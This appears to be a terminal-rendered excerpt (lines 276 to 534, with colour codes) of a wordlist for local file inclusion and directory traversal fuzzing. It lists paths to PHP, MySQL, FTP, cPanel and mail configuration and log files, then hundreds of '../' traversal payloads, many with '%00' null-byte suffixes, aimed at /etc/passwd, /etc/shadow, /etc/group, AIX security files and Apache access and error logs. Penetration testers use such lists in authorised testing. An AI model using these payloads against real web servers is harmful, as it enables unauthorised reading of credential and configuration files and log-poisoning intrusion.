[38;5;238m 276[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/php4/cgi/php.ini[0m
[38;5;238m 277[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/php5/cgi/php.ini[0m
[38;5;238m 278[0m   [38;5;238m│[0m [38;2;248;248;242m/php5\php.ini[0m
[38;5;238m 279[0m   [38;5;238m│[0m [38;2;248;248;242m/php4\php.ini[0m
[38;5;238m 280[0m   [38;5;238m│[0m [38;2;248;248;242m/php\php.ini[0m
[38;5;238m 281[0m   [38;5;238m│[0m [38;2;248;248;242m/PHP\php.ini[0m
[38;5;238m 282[0m   [38;5;238m│[0m [38;2;248;248;242m/WINDOWS\php.ini[0m
[38;5;238m 283[0m   [38;5;238m│[0m [38;2;248;248;242m/WINNT\php.ini[0m
[38;5;238m 284[0m   [38;5;238m│[0m [38;2;248;248;242m/apache\php\php.ini[0m
[38;5;238m 285[0m   [38;5;238m│[0m [38;2;248;248;242m/xampp\apache\bin\php.ini[0m
[38;5;238m 286[0m   [38;5;238m│[0m [38;2;248;248;242m/NetServer\bin\stable\apache\php.ini[0m
[38;5;238m 287[0m   [38;5;238m│[0m [38;2;248;248;242m/home2\bin\stable\apache\php.ini[0m
[38;5;238m 288[0m   [38;5;238m│[0m [38;2;248;248;242m/home\bin\stable\apache\php.ini[0m
[38;5;238m 289[0m   [38;5;238m│[0m [38;2;248;248;242m/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini[0m
[38;5;238m 290[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/cpanel/logs[0m
[38;5;238m 291[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/cpanel/logs/stats_log[0m
[38;5;238m 292[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/cpanel/logs/access_log[0m
[38;5;238m 293[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/cpanel/logs/error_log[0m
[38;5;238m 294[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/cpanel/logs/license_log[0m
[38;5;238m 295[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/cpanel/logs/login_log[0m
[38;5;238m 296[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/mysql/mysql-bin.log[0m
[38;5;238m 297[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/mysql.log[0m
[38;5;238m 298[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/mysqlderror.log[0m
[38;5;238m 299[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/mysql/mysql.log[0m
[38;5;238m 300[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/mysql/mysql-slow.log[0m
[38;5;238m 301[0m   [38;5;238m│[0m [38;2;248;248;242m/var/mysql.log[0m
[38;5;238m 302[0m   [38;5;238m│[0m [38;2;248;248;242m/var/lib/mysql/my.cnf[0m
[38;5;238m 303[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/mysql/my.cnf[0m
[38;5;238m 304[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/my.cnf[0m
[38;5;238m 305[0m   [38;5;238m│[0m [38;2;248;248;242mC:\boot.ini[0m
[38;5;238m 306[0m   [38;5;238m│[0m [38;2;248;248;242mC:/boot.ini[0m
[38;5;238m 307[0m   [38;5;238m│[0m [38;2;248;248;242mC:\wamp\logs\access.log[0m
[38;5;238m 308[0m   [38;5;238m│[0m [38;2;248;248;242mc:\wamp\logs\access.log[0m
[38;5;238m 309[0m   [38;5;238m│[0m [38;2;248;248;242mc:/wamp/logs/access.log[0m
[38;5;238m 310[0m   [38;5;238m│[0m [38;2;248;248;242mC:/wamp/logs/access.log[0m
[38;5;238m 311[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/logrotate.d/proftpd[0m
[38;5;238m 312[0m   [38;5;238m│[0m [38;2;248;248;242m/www/logs/proftpd.system.log[0m
[38;5;238m 313[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/proftpd[0m
[38;5;238m 314[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/proftp.conf[0m
[38;5;238m 315[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/protpd/proftpd.conf[0m
[38;5;238m 316[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/vhcs2/proftpd/proftpd.conf[0m
[38;5;238m 317[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/proftpd/modules.conf[0m
[38;5;238m 318[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/vsftpd.log[0m
[38;5;238m 319[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/vsftpd.chroot_list[0m
[38;5;238m 320[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/logrotate.d/vsftpd.log[0m
[38;5;238m 321[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/vsftpd/vsftpd.conf[0m
[38;5;238m 322[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/vsftpd.conf[0m
[38;5;238m 323[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/chrootUsers[0m
[38;5;238m 324[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/xferlog[0m
[38;5;238m 325[0m   [38;5;238m│[0m [38;2;248;248;242m/var/adm/log/xferlog[0m
[38;5;238m 326[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/wu-ftpd/ftpaccess[0m
[38;5;238m 327[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/wu-ftpd/ftphosts[0m
[38;5;238m 328[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/wu-ftpd/ftpusers[0m
[38;5;238m 329[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/sbin/pure-config.pl[0m
[38;5;238m 330[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/etc/pure-ftpd.conf[0m
[38;5;238m 331[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/pure-ftpd/pure-ftpd.conf[0m
[38;5;238m 332[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/etc/pure-ftpd.conf[0m
[38;5;238m 333[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/etc/pureftpd.pdb[0m
[38;5;238m 334[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/pureftpd/etc/pureftpd.pdb[0m
[38;5;238m 335[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/pureftpd/sbin/pure-config.pl[0m
[38;5;238m 336[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/pureftpd/etc/pure-ftpd.conf[0m
[38;5;238m 337[0m   [38;5;238m│[0m [38;2;248;248;242m-/etc/pure-ftpd.conf[0m
[38;5;238m 338[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/pure-ftpd/pure-ftpd.pdb[0m
[38;5;238m 339[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/pureftpd.pdb[0m
[38;5;238m 340[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/pureftpd.passwd[0m
[38;5;238m 341[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/pure-ftpd/pureftpd.pdb[0m
[38;5;238m 342[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/ports/ftp/pure-ftpd/[0m
[38;5;238m 343[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/ports/net/pure-ftpd/[0m
[38;5;238m 344[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/pkgsrc/net/pureftpd/[0m
[38;5;238m 345[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/ports/contrib/pure-ftpd/[0m
[38;5;238m 346[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/pure-ftpd/pure-ftpd.log[0m
[38;5;238m 347[0m   [38;5;238m│[0m [38;2;248;248;242m/logs/pure-ftpd.log[0m
[38;5;238m 348[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/pureftpd.log[0m
[38;5;238m 349[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/ftp-proxy/ftp-proxy.log[0m
[38;5;238m 350[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/ftp-proxy[0m
[38;5;238m 351[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/ftplog[0m
[38;5;238m 352[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/logrotate.d/ftp[0m
[38;5;238m 353[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/ftpchroot[0m
[38;5;238m 354[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/ftphosts[0m
[38;5;238m 355[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/exim_mainlog[0m
[38;5;238m 356[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/exim/mainlog[0m
[38;5;238m 357[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/maillog[0m
[38;5;238m 358[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/exim_paniclog[0m
[38;5;238m 359[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/exim/paniclog[0m
[38;5;238m 360[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/exim/rejectlog[0m
[38;5;238m 361[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/exim_rejectlog[0m
[38;5;238m 362[0m   [38;5;238m│[0m [38;2;248;248;242m../etc/passwd%00[0m
[38;5;238m 363[0m   [38;5;238m│[0m [38;2;248;248;242m../../etc/passwd%00[0m
[38;5;238m 364[0m   [38;5;238m│[0m [38;2;248;248;242m../../../etc/passwd%00[0m
[38;5;238m 365[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../etc/passwd%00[0m
[38;5;238m 366[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../etc/passwd%00[0m
[38;5;238m 367[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../etc/passwd%00[0m
[38;5;238m 368[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../etc/passwd%00[0m
[38;5;238m 369[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../etc/passwd%00[0m
[38;5;238m 370[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../etc/passwd%00[0m
[38;5;238m 371[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../etc/passwd%00[0m
[38;5;238m 372[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../etc/passwd%00[0m
[38;5;238m 373[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../etc/passwd%00[0m
[38;5;238m 374[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../etc/passwd%00[0m
[38;5;238m 375[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../etc/passwd%00[0m
[38;5;238m 376[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../../etc/passwd%00[0m
[38;5;238m 377[0m   [38;5;238m│[0m [38;2;248;248;242m../etc/shadow[0m
[38;5;238m 378[0m   [38;5;238m│[0m [38;2;248;248;242m../../etc/shadow[0m
[38;5;238m 379[0m   [38;5;238m│[0m [38;2;248;248;242m../../../etc/shadow[0m
[38;5;238m 380[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../etc/shadow[0m
[38;5;238m 381[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../etc/shadow[0m
[38;5;238m 382[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../etc/shadow[0m
[38;5;238m 383[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../etc/shadow[0m
[38;5;238m 384[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../etc/shadow[0m
[38;5;238m 385[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../etc/shadow[0m
[38;5;238m 386[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../etc/shadow[0m
[38;5;238m 387[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../etc/shadow[0m
[38;5;238m 388[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../etc/shadow[0m
[38;5;238m 389[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../etc/shadow[0m
[38;5;238m 390[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../etc/shadow[0m
[38;5;238m 391[0m   [38;5;238m│[0m [38;2;248;248;242m../etc/group[0m
[38;5;238m 392[0m   [38;5;238m│[0m [38;2;248;248;242m../../etc/group[0m
[38;5;238m 393[0m   [38;5;238m│[0m [38;2;248;248;242m../../../etc/group[0m
[38;5;238m 394[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../etc/group[0m
[38;5;238m 395[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../etc/group[0m
[38;5;238m 396[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../etc/group[0m
[38;5;238m 397[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../etc/group[0m
[38;5;238m 398[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../etc/group[0m
[38;5;238m 399[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../etc/group[0m
[38;5;238m 400[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../etc/group[0m
[38;5;238m 401[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../etc/group[0m
[38;5;238m 402[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../etc/group[0m
[38;5;238m 403[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../etc/group[0m
[38;5;238m 404[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../etc/group[0m
[38;5;238m 405[0m   [38;5;238m│[0m [38;2;248;248;242m../etc/security/group[0m
[38;5;238m 406[0m   [38;5;238m│[0m [38;2;248;248;242m../../etc/security/group[0m
[38;5;238m 407[0m   [38;5;238m│[0m [38;2;248;248;242m../../../etc/security/group[0m
[38;5;238m 408[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../etc/security/group[0m
[38;5;238m 409[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../etc/security/group[0m
[38;5;238m 410[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../etc/security/group[0m
[38;5;238m 411[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../etc/security/group[0m
[38;5;238m 412[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../etc/security/group[0m
[38;5;238m 413[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../etc/security/group[0m
[38;5;238m 414[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../etc/security/group[0m
[38;5;238m 415[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../etc/security/group[0m
[38;5;238m 416[0m   [38;5;238m│[0m [38;2;248;248;242m../etc/security/passwd[0m
[38;5;238m 417[0m   [38;5;238m│[0m [38;2;248;248;242m../../etc/security/passwd[0m
[38;5;238m 418[0m   [38;5;238m│[0m [38;2;248;248;242m../../../etc/security/passwd[0m
[38;5;238m 419[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../etc/security/passwd[0m
[38;5;238m 420[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../etc/security/passwd[0m
[38;5;238m 421[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../etc/security/passwd[0m
[38;5;238m 422[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../etc/security/passwd[0m
[38;5;238m 423[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../etc/security/passwd[0m
[38;5;238m 424[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../etc/security/passwd[0m
[38;5;238m 425[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../etc/security/passwd[0m
[38;5;238m 426[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../etc/security/passwd[0m
[38;5;238m 427[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../etc/security/passwd[0m
[38;5;238m 428[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../etc/security/passwd[0m
[38;5;238m 429[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../etc/security/passwd[0m
[38;5;238m 430[0m   [38;5;238m│[0m [38;2;248;248;242m../etc/security/user[0m
[38;5;238m 431[0m   [38;5;238m│[0m [38;2;248;248;242m../../etc/security/user[0m
[38;5;238m 432[0m   [38;5;238m│[0m [38;2;248;248;242m../../../etc/security/user[0m
[38;5;238m 433[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../etc/security/user[0m
[38;5;238m 434[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../etc/security/user[0m
[38;5;238m 435[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../etc/security/user[0m
[38;5;238m 436[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../etc/security/user[0m
[38;5;238m 437[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../etc/security/user[0m
[38;5;238m 438[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../etc/security/user[0m
[38;5;238m 439[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../etc/security/user[0m
[38;5;238m 440[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../etc/security/user[0m
[38;5;238m 441[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../etc/security/user[0m
[38;5;238m 442[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../etc/security/user[0m
[38;5;238m 443[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../etc/httpd/logs/acces_log%00[0m
[38;5;238m 444[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../etc/httpd/logs/acces.log%00[0m
[38;5;238m 445[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../etc/httpd/logs/error_log%00[0m
[38;5;238m 446[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../etc/httpd/logs/error.log%00[0m
[38;5;238m 447[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../usr/local/apache/logs/access_log%00[0m
[38;5;238m 448[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../usr/local/apache/logs/access.log%00[0m
[38;5;238m 449[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../usr/local/apache/logs/error_log%00[0m
[38;5;238m 450[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../usr/local/apache/logs/error.log%00[0m
[38;5;238m 451[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../usr/lib/security/mkuser.default%00[0m
[38;5;238m 452[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00[0m
[38;5;238m 453[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log%00[0m
[38;5;238m 454[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log%00[0m
[38;5;238m 455[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log%00[0m
[38;5;238m 456[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../apache/logs/access.log%00[0m
[38;5;238m 457[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../apache/logs/error.log%00[0m
[38;5;238m 458[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../apache2/logs/error.log%00[0m
[38;5;238m 459[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../apache2/logs/access.log%00[0m
[38;5;238m 460[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/www/logs/access_log%00[0m
[38;5;238m 461[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/www/logs/access.log%00[0m
[38;5;238m 462[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/apache/access_log%00[0m
[38;5;238m 463[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/apache2/access_log%00[0m
[38;5;238m 464[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/apache/access.log%00[0m
[38;5;238m 465[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/apache2/access.log%00[0m
[38;5;238m 466[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/www/logs/error_log%00[0m
[38;5;238m 467[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/www/logs/error.log%00[0m
[38;5;238m 468[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/access_log%00[0m
[38;5;238m 469[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/access.log%00[0m
[38;5;238m 470[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/apache/error_log%00[0m
[38;5;238m 471[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/apache2/error_log%00[0m
[38;5;238m 472[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/apache/error.log%00[0m
[38;5;238m 473[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/apache2/error.log%00[0m
[38;5;238m 474[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/error_log%00[0m
[38;5;238m 475[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/error.log%00[0m
[38;5;238m 476[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/httpd/access_log%00[0m
[38;5;238m 477[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/httpd/error_log%00[0m
[38;5;238m 478[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/httpd/access.log%00[0m
[38;5;238m 479[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/httpd/error.log%00[0m
[38;5;238m 480[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../opt/lampp/logs/access_log%00[0m
[38;5;238m 481[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../opt/lampp/logs/error_log%00[0m
[38;5;238m 482[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../opt/xampp/logs/access_log%00[0m
[38;5;238m 483[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../opt/xampp/logs/error_log%00[0m
[38;5;238m 484[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../opt/lampp/logs/access.log%00[0m
[38;5;238m 485[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../opt/lampp/logs/error.log%00[0m
[38;5;238m 486[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../opt/xampp/logs/access.log%00[0m
[38;5;238m 487[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../opt/xampp/logs/error.log%00[0m
[38;5;238m 488[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../etc/httpd/logs/acces_log[0m
[38;5;238m 489[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../etc/httpd/logs/acces.log[0m
[38;5;238m 490[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../etc/httpd/logs/error_log[0m
[38;5;238m 491[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../etc/httpd/logs/error.log[0m
[38;5;238m 492[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../usr/local/apache/logs/access_log[0m
[38;5;238m 493[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../usr/local/apache/logs/access.log[0m
[38;5;238m 494[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../usr/local/apache/logs/error_log[0m
[38;5;238m 495[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../usr/local/apache/logs/error.log[0m
[38;5;238m 496[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../usr/lib/security/mkuser.default[0m
[38;5;238m 497[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log[0m
[38;5;238m 498[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log[0m
[38;5;238m 499[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log[0m
[38;5;238m 500[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log[0m
[38;5;238m 501[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../apache/logs/access.log[0m
[38;5;238m 502[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../apache/logs/error.log[0m
[38;5;238m 503[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../apache2/logs/error.log[0m
[38;5;238m 504[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../apache2/logs/access.log[0m
[38;5;238m 505[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/www/logs/access_log[0m
[38;5;238m 506[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/www/logs/access.log[0m
[38;5;238m 507[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/apache/access_log[0m
[38;5;238m 508[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/apache2/access_log[0m
[38;5;238m 509[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/apache/access.log[0m
[38;5;238m 510[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/apache2/access.log[0m
[38;5;238m 511[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/www/logs/error_log[0m
[38;5;238m 512[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/www/logs/error.log[0m
[38;5;238m 513[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/access_log[0m
[38;5;238m 514[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/access.log[0m
[38;5;238m 515[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/apache/error_log[0m
[38;5;238m 516[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/apache2/error_log[0m
[38;5;238m 517[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/apache/error.log[0m
[38;5;238m 518[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/apache2/error.log[0m
[38;5;238m 519[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/error_log[0m
[38;5;238m 520[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/error.log[0m
[38;5;238m 521[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/httpd/access_log[0m
[38;5;238m 522[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/httpd/error_log[0m
[38;5;238m 523[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/httpd/access.log[0m
[38;5;238m 524[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/httpd/error.log[0m
[38;5;238m 525[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../opt/lampp/logs/access_log[0m
[38;5;238m 526[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../opt/lampp/logs/error_log[0m
[38;5;238m 527[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../opt/xampp/logs/access_log[0m
[38;5;238m 528[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../opt/xampp/logs/error_log[0m
[38;5;238m 529[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../opt/lampp/logs/access.log[0m
[38;5;238m 530[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../opt/lampp/logs/error.log[0m
[38;5;238m 531[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../opt/xampp/logs/access.log[0m
[38;5;238m 532[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../opt/xampp/logs/error.log[0m
[38;5;238m 533[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/httpd-access.log[0m
[38;5;238m 534[0m   [38;5;238m│[0m [38;2;248;248;242m../var/log/httpd-access.log[0m
